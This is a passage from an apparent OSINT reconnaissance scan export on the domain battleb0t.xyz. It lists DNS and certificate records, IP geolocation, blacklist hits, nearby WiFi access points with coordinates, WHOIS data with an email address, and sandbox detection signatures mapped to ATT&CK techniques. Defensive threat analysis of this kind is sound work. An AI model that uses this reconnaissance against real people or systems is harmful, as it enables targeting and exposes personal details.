10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://hilarious-kelpie-473db1.netlify.app/"- [Source: Input]\n Pattern match: 
"https://hilarious-kelpie-473db1.netlify.app"- [Source: Input]\n Pattern match: "www.herokucdn.com"- [Source: PCAP]\n Pattern match: "http://unsub1.cfd/"- [Source: PCAP]\n Heuristic match: "o.ss2.us"- [Source: PCAP]\n Heuristic match: "GET //MEowSDBGMEQwQjAJBgUrDgMCGgUABBSLwZ6EW5gdYc9UaSEaaLjjETNtkAQUv1%2B30c7dH4b0W1Ws3NcQwg6piOcCCQCnDkpMNIK3fw%3D%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: o.ss2.us"- [Source: PCAP]\n Heuristic match: "crl.rootg2.amazontrust.com"- [Source: PCAP]\n Heuristic match: "GET /rootg2.crl HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: crl.rootg2.amazontrust.com"- [Source: PCAP]\n Heuristic match: "ocsp.rootg2.amazontrust.com"- [Source: PCAP]\n Heuristic match: "GET /MFQwUjBQME4wTDAJBgUrDgMCGgUABBSIfaREXmfqfJR3TkMYnD7O5MhzEgQUnF8A36oB1zArOIiiuG1KnPIRkYMCEwZ%2FlEoqJ83z%2BsKuKwH5CO65xMY%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: ocsp.rootg2.amazontrust.com"- [Source: PCAP]\n Heuristic match: "crl.rootca1.amazontrust.com"- [Source: PCAP]\n Heuristic match: "GET /rootca1.crl HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: crl.rootca1.amazontrust.com"- [Source: PCAP]\n Heuristic match: "ocsp.rootca1.amazontrust.com"- [Source: PCAP]\n Heuristic match: "GET /MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPWaOUU8%2B5VZ5%2Fa9jFTaU9pkK3FAQUhBjMhTTsvAyUlC4IWZzHshBOCggCEwZ%2FlFeFh%2Bisd96yUzJbvJmLVg0%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: ocsp.rootca1.amazontrust.com"- [Source: PCAP]\n Heuristic match: "ocsp.sca1b.amazontrust.com"- [Source: PCAP]\n Heuristic match: "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQz9arGHWbnBV0DFzpNHz4YcTiFDQQUWaRmBlKge5WSPKOUByeWdFv5PdACEA11CXliCX0s5ZbPbTWItcU%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: ocsp.sca1b.amazontrust.com"- [Source: PCAP]\n Heuristic match: 
"crl.sca1b.amazontrust.com"- [Source: PCAP]\n Heuristic match: "GET /sca1b-1.crl HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: crl.sca1b.amazontrust.com"- [Source: PCAP]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-23', u'name': u'Sends traffic on typical HTTP outbound port, but without HTTP header', u'attck_id_ | 104.196.30.220 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | FruityWifi-003 (Net ID: 00:07:0E:65:CF:39) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:45:51 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 2 | 0 | None | {u'city': u'Montreal', u'security': {u'is_vpn': False}, u'city_geoname_id': 6077243, u'region_geoname_id': 6115047, u'country': u'United States', u'region': u'Quebec', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'CLOUDFLARENET', u'isp_name': u'Cloudflare, Inc.', u'organization_name': u'Cloudflare, Inc.', u'autonomous_system_number': 13335}, u'continent_code': u'NA', u'currency': {u'currency_name': u'USD', u'currency_code': u'USD'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/US_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/US_flag.png', u'unicode': u'U+1F1FA U+1F1F8', u'emoji': u'\U0001f1fa\U0001f1f8'}, u'postal_code': u'H4X', u'longitude': -97.822, u'country_code': u'US', u'timezone': {u'abbreviation': u'CDT', u'gmt_offset': -5, u'is_dst': True, u'name': u'America/Chicago', u'current_time': u'21:45:50'}, u'latitude': 37.751, u'country_geoname_id': 6252001, u'continent_geoname_id': 6255149, u'country_is_eu': False, u'ip_address': u'2606:4700:3031::6815:6a6', u'continent': u'North America', u'region_iso_code': u'QC'} | 2606:4700:3031::6815:6a6 |
| 2023-05-12 02:44:26 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | battleb0t.xyz | CN=*.battleb0t.xyz |
| 2023-05-12 02:55:28 | Physical Location | No | URLScan.io | 0 | 0 | 2 | 0 | None | DE | kekw.battleb0t.xyz |
| 2023-05-12 03:03:24 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0000-bigtree.github.io |
| 2023-05-12 02:45:34 | Raw DNS Records | No | DNS Raw Records | 0 | 0 | 1 | 0 | None | battleb0t.xyz. 300 IN MX 21 route2.mx.cloudflare.net.; battleb0t.xyz. 300 IN MX 60 route3.mx.cloudflare.net.; battleb0t.xyz. 300 IN MX 68 route1.mx.cloudflare.net. | battleb0t.xyz |
| 2023-05-12 03:17:56 | Malicious IP on Same Subnet | Yes | CINS Army List | 0 | 0 | 4 | 0 | None | cinsscore.com [64.226.80.0/20] http://cinsscore.com/list/ci-badguys.txt | 64.226.80.0/20 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 2WIRE630 (Net ID: 00:02:2D:23:E0:24) | 37.7642, -122.3993 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | HB (Net ID: 00:01:36:35:4A:AA) | 34.0544, -118.244 |
| 2023-05-12 03:16:17 | Similar Domain | Yes | Tool - DNSTwist | 1 | 0 | 1 | 0 | None | ashu.xyz | ayhu.xyz |
| 2023-05-12 03:00:56 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.89): Search Engine; Last Activity: 0 days ago; Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | WEST4541 (Net ID: 00:12:0E:7E:7A:31) | 32.8608, -79.9746 |
| 2023-05-12 02:51:49 | Raw Data from RIRs | No | Hybrid Analysis | 2 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://this.props.pagesize/2)),e.currentdatapageendindex=math.min(e.currentdatapagestartindex+this.props.pagesize,this.props.rows.length-1),r=!0', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 23, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://click9.bigmarker.com/links/BY79pHvYX2Z/QPJiO7I68/tMwYeVPDKIXG/IN5CQt3PP-?bu=7b9a2e229a7b00d2abf1a67ee21718a4f9a384d3997b4233ff5125d2b050eecdfd56122f5766da81f9380883c6330281152549d890a090250ca7457e3d6af512de37a44ef72cc832a7cff15e41cb02af8a17863d1d3fd8b23804d4f2277ba16828665e73cb7759a78343309ede93ee8fcceaf565cf60789ea78d923ffa76fe3d', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\SM0:2872:304:WilStaging_02"\n "InternetShortcutMutex"\n "Local\\SM0:2872:120:WilError_01"\n "SM0:2872:120:WilError_01"\n "SM0:2872:304:WilStaging_02"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.231.70.218:443"\n "138.91.254.96:443"\n "3.235.65.215:443"\n "13.227.21.122:443"\n "185.199.108.153:443"\n "13.227.21.6:443"\n "151.101.0.176:443"\n "142.251.2.156:443"\n "151.101.2.137:443"\n "162.247.241.14:443"'}, {u'category': u'General', u'origin': u'Network Traffic', 
u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.edgeoffer.microsoft.com"\n "bam.nr-data.net"\n "checkout.stripe.com"\n "click9.bigmarker.com"\n "d1f74no97k6yi9.cloudfront.net"\n "d5ln38p3754yc.cloudfront.net"\n "js-agent.newrelic.com"\n "stats.g.doubleclick.net"\n "webrtc.github.io"\n "www.bigmarker.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string ""paypal.com"," (Indicator: "dir "; File: "wallet-checkout-eligible-sites-pre-stable.json")\n Found string ""baysidebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""comeherebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""www.facebook.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""linkedin.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string "<meta name="twitter:card" content="summary_large_image">" (Indicator: "dir "; File: "urlref_httpsclick9.bigmarker.comlinksBY79pHvYX2ZQPJiO7I68tMwYeVPDKIXGIN5CQt3PP-bu_7b9a2e229a7b00d2abf1a67ee21718a4f9a384d3997b4233ff512")\n Found string "<meta name="twitter:site" content="@bigmarker">" (Indicator: "dir "; File: "urlref_httpsclick9.bigmarker.comlinksBY79pHvYX2ZQPJiO7I68tMwYeVPDKIXGIN5CQt3PP-bu_7b9a2e229a7b00d2abf1a67ee21718a4f9a384d3997b4233ff512")\n Found string "<meta name="twitter:creator" content="@bigmarker">" (Indicator: "dir "; File: 
"urlref_httpsclick9.bigmarker.comlinksBY79pHvYX2ZQPJiO7I68tMwYeVPDKIXGIN5CQt3PP-bu_7b9a2e229a7b00d2abf1a67ee21718a4f9a384d3997b4233ff512")\n Found string "<meta name="twitter:title" content="The Inbound Customer Experience">" (Indicator: "dir "; File: "urlref_httpsclick9.bigmarker.comlinksBY79pHvYX2ZQPJiO7I68tMwYeVPDKIXGIN5CQt3PP-bu_7b9a2e229a7b00d2abf1a67ee21718a4f9a384d3997b4233ff512")\n Found string "<meta name="twitter:description" content="Our panelists will discuss a variety of questions including:" (Indicator: "dir "; File: "urlref_httpsclick9.bigmarker.comlinksBY79pHvYX2ZQPJiO7I68tMwYeVPDKIXGIN5CQt3PP-bu_7b9a2e229a7b00d2abf1a67ee21718a4f9a384d3997b4233ff512"), Found string "<meta name="twitter:image" content="https://d5ln38p3754yc.cloudfront.net/conference_icons/7821611/large/1677693079-c5b46aaa6c8ef248.jpg?1677693079">" (Indicator: "dir "; File: "urlref_httpsclick9.bigmarker.comlinksBY79pHvYX2ZQPJiO7I68tMwYeVPDKIXGIN5CQt3PP-bu_7b9a2e229a7b00d2abf1a67ee21718a4f9a384d3997b4233ff512")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""manitobaharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""highkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""mandalascrubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""primalharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""amazingclubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""purehockey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""order.firehousesubs.com"," (Source: 
wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""cousinssubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""digikey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""hockeymonkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""4amscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""6whiskey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""99centsubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""allieandmickey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""alteregoscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""annabelbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""aspirefashionscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""augustbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""bananasmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""baseballmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\crashpad\\settings.dat"\n "msedge.exe" writes file "\\device\\namedpipe\\wkssvc"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\variations"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\last version"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\vpn 
tokens-journal"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\index"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_0"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_1"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_2"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_3"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\history"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\favicons"'}, {u'category': u'Installation/Persistence', u'origin': u'File/Memory', u'identifier': u'string-396', u'name': u'Contains ability to create/modify Windows services (Powershell command string)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1543/003', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1543.003', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'Found string "<div class="registrants-add-contents" style="padding-bottom: 28px">" (Indicator: "Add-Content"; File: "urlref_httpsclick9.bigmarker.comlinksBY79pHvYX2ZQPJiO7I68tMwYeVPDKIXGIN5CQt3PP-bu_7b9a2e229a7b00d2abf1a67ee21718a4f9a384d3997b4233ff512")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', 
u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"shopping.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\636_742791881\\shopping.js]- [targetUID: 00000000-00000636]\n "data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00000636]\n "Ruleset Data" has type "da | 185.199.108.153 |
| 2023-05-12 03:09:27 | SSL Certificate - Issued to | No | SSL Certificate Analyzer | 1 | 0 | 2 | 0 | None | C=US,ST=California,L=San Francisco,O=Cloudflare\, Inc.,CN=sni.cloudflaressl.com | 188.114.97.1 |
| 2023-05-12 03:01:26 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.250): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:50:23 | Blacklisted IP Address | Yes | Honeypot Checker | 0 | 1 | 2 | 0 | None | Honeypotproject (104.21.6.166): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 104.21.6.166 |
| 2023-05-12 02:53:56 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 2606:50c0:8001::153:80 | 2606:50c0:8001::153 |
| 2023-05-12 02:57:25 | Internet Name | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | funny.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 0 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/master058_1.PNG | https://funny.battleb0t.xyz/ |
| 2023-05-12 02:45:50 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 2 | 0 | None | {u'city': u'Montreal', u'security': {u'is_vpn': False}, u'city_geoname_id': 6077243, u'region_geoname_id': 6115047, u'country': u'United States', u'region': u'Quebec', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'CLOUDFLARENET', u'isp_name': u'Cloudflare, Inc.', u'organization_name': u'Cloudflare, Inc.', u'autonomous_system_number': 13335}, u'continent_code': u'NA', u'currency': {u'currency_name': u'USD', u'currency_code': u'USD'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/US_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/US_flag.png', u'unicode': u'U+1F1FA U+1F1F8', u'emoji': u'\U0001f1fa\U0001f1f8'}, u'postal_code': u'H4X', u'longitude': -97.822, u'country_code': u'US', u'timezone': {u'abbreviation': u'CDT', u'gmt_offset': -5, u'is_dst': True, u'name': u'America/Chicago', u'current_time': u'21:45:49'}, u'latitude': 37.751, u'country_geoname_id': 6252001, u'continent_geoname_id': 6255149, u'country_is_eu': False, u'ip_address': u'2606:4700:3031::ac43:8709', u'continent': u'North America', u'region_iso_code': u'QC'} | 2606:4700:3031::ac43:8709 |
| 2023-05-12 03:01:17 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.145): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:55:05 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["7c5b59d17bc80231-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 188.114.97.1 |
| 2023-05-12 02:44:38 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:81:34:2e:fd:61:48:b5:6f:11:ca:36:0b:dc:62:9a:cf:52
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 09:44:02 2022 GMT
Not After : Feb 15 09:44:01 2023 GMT
Subject: CN=vscode.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:eb:b0:96:39:35:d3:30:8a:f5:f9:da:c5:cf:96:
1a:e7:f9:f3:a9:a3:ac:48:a3:a4:b9:37:4c:63:75:
40:36:2d:7f:85:6e:28:b7:ff:1d:a9:b7:7a:9e:a9:
3c:18:2e:aa:60:9b:01:a6:03:71:f5:37:c6:c4:08:
7f:2e:0c:29:9a:02:88:31:a0:12:65:5e:31:21:f1:
5f:d6:97:6e:ea:18:9d:90:ce:ff:12:3b:cb:ae:3a:
f3:b3:33:e6:51:66:ee:77:b1:1e:2d:63:9d:86:29:
e8:e7:da:f5:95:bf:4c:37:58:2b:4b:3b:b3:82:8c:
63:1f:3a:3d:4d:85:c4:0d:2f:dd:0c:39:76:ab:a5:
7c:fc:53:9d:e0:67:9e:f7:6e:00:5d:8f:60:c1:b4:
dd:6b:fb:d3:a5:23:a0:c0:99:85:04:91:d1:e3:63:
1f:33:3f:20:df:22:22:a9:89:b5:26:f8:3b:cf:ec:
a6:2f:0a:b5:ce:e9:fd:d6:cf:3c:d3:6e:35:3e:a2:
cb:0a:4c:43:1f:c2:91:d1:57:92:fc:79:bc:b6:50:
67:72:7f:f2:de:ba:e6:81:c8:81:ad:91:41:c2:41:
68:e4:66:e4:cf:77:e7:8f:ad:4a:dd:cf:21:57:7e:
5c:5b:1a:bf:18:03:99:5a:e7:0b:bf:13:4e:4f:9d:
f8:63:3c:53:43:ba:5c:2b:86:aa:b1:6c:59:33:66:
06:b4:0c:58:5e:eb:57:fb:21:90:64:8e:04:88:5e:
93:71:bc:07:a7:76:0a:39:5b:e9:8a:11:59:0c:e9:
3d:9f:ef:48:1a:15:f1:b6:8d:38:c6:ac:b0:3d:55:
62:fd:ec:ca:10:f7:3e:ad:09:2b:f9:07:39:64:89:
c0:8c:df:58:83:b1:49:a3:6a:de:8d:1d:b0:68:22:
42:05:11:89:f5:28:3d:e2:a8:01:12:cb:7f:55:12:
36:97:26:ba:dd:f2:81:bc:89:38:da:02:ae:fd:90:
99:5d:a3:f5:46:95:ac:11:67:63:06:d1:ab:ad:cc:
15:5b:ae:15:c5:be:e2:e1:4a:b9:58:65:89:ff:47:
b7:6c:bd:4d:78:de:bc:99:4b:30:66:94:63:8c:10:
f1:ba:46:36:e6:f8:37:e7:a4:4a:58:f8:29:e5:40:
29:33:93:f8:de:48:92:4e:5d:bb:50:eb:49:71:90:
ef:b5:9b:2c:bf:b0:19:fb:12:45:a7:b3:2e:45:b4:
1b:cf:46:ab:19:7f:6c:7d:d1:f9:c0:87:cb:fb:3f:
0d:76:c4:c2:98:11:bd:11:fc:93:89:ac:ab:3e:87:
64:67:c1:b8:49:1c:b8:1a:ca:85:02:c8:58:c0:9e:
e2:87:d7
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
A7:55:24:63:5E:86:20:7B:DE:F3:EF:D8:48:33:0B:C7:5C:3F:22:72
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:vscode.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Nov 17 10:44:02.310 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:A0:8D:98:FA:F9:D9:C8:59:5F:87:D3:
BB:68:8E:C2:BB:E7:07:F3:66:F0:BF:C4:32:F7:17:14:
85:A0:6B:D1:81:02:21:00:E1:E7:8A:92:A4:1B:C4:8C:
79:7C:C9:6A:17:B8:C7:84:C4:57:6B:7F:E9:88:F3:FA:
7F:17:65:61:BF:48:50:7D
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Nov 17 10:44:02.268 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:8A:CF:A1:DE:F1:EC:82:39:97:4B:3B:
E7:19:AD:34:CE:C3:F8:D5:48:1A:55:78:09:18:4D:A5:
36:34:CF:46:A1:02:20:77:AE:18:F8:2D:70:F3:32:66:
62:44:0D:F1:40:70:3E:89:21:C3:7B:CF:8C:98:9B:A8:
93:78:E1:26:FD:75:C4
Signature Algorithm: sha256WithRSAEncryption
85:47:39:10:69:02:19:cb:50:8c:08:91:e6:11:b3:5f:9d:fa:
b8:b1:83:e5:ff:e8:1d:ed:c5:00:66:a8:84:ff:8c:00:23:34:
e3:46:98:32:83:6e:3d:e3:58:01:45:e8:a3:86:95:02:4e:5e:
0c:2e:72:f2:22:72:8e:a0:b1:06:5d:d0:13:ed:5c:d8:a1:70:
83:1c:43:aa:b9:57:4d:3c:0c:d8:a7:d4:a3:f6:94:cb:e4:d0:
4b:e5:4b:8f:fc:90:9f:6a:f2:f7:82:9b:08:f2:f3:44:1b:86:
18:89:5e:72:af:ca:a9:09:1e:e2:c5:ae:e1:9c:e5:9c:5e:66:
8e:8b:22:8a:36:54:2a:4e:6a:d6:82:11:53:86:c5:74:e3:90:
90:6f:46:a5:ce:07:f8:45:77:70:d4:77:73:14:c3:71:96:31:
7a:30:09:e0:7b:e0:e8:34:13:61:49:d3:bf:fa:aa:2e:da:45:
5f:25:e3:22:f8:d8:94:10:30:4c:38:a3:69:e5:a9:44:0f:99:
ab:4f:8a:ac:8b:23:68:e6:f5:dc:3a:a2:45:58:75:61:f0:50:
88:14:ff:16:c7:72:ba:24:24:ed:84:3a:6f:d4:e8:8e:26:df:
24:ff:a8:40:5d:67:21:98:6b:ad:ae:da:d7:ae:81:57:3d:a1:
46:7c:24:9a
| battleb0t.xyz |
| 2023-05-12 03:03:39 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 01-scripts.github.io |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | a-zoom (Net ID: 00:01:38:D4:87:A3) | 37.7813933,-122.3918002 |
| 2023-05-12 02:55:11 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 500 Internal Server Error
X-Powered-By: Express
Content-Security-Policy: default-src 'none'
X-Content-Type-Options: nosniff
Content-Type: text/html; charset=utf-8
Content-Length: 1391
Date: <REDACTED>
Connection: keep-alive
| 87.248.157.102 |
| 2023-05-12 03:31:29 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 5 | 0 | None | d3fc0n6@protonmail.com | Domain Name: RATHOOK.CC
Registry Domain ID: 163793658_DOMAIN_CC-VRSN
Registrar WHOIS Server: whois.porkbun.com
Registrar URL: http://porkbun.com
Updated Date: 2022-09-07T10:53:59Z
Creation Date: 2021-09-13T01:07:39Z
Registry Expiry Date: 2024-09-13T01:07:39Z
Registrar: Porkbun LLC
Registrar IANA ID: 1861
Registrar Abuse Contact Email: abuse@porkbun.com
Registrar Abuse Contact Phone: 5038508351
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: CURITIBA.NS.PORKBUN.COM
Name Server: FORTALEZA.NS.PORKBUN.COM
Name Server: MACEIO.NS.PORKBUN.COM
Name Server: SALVADOR.NS.PORKBUN.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
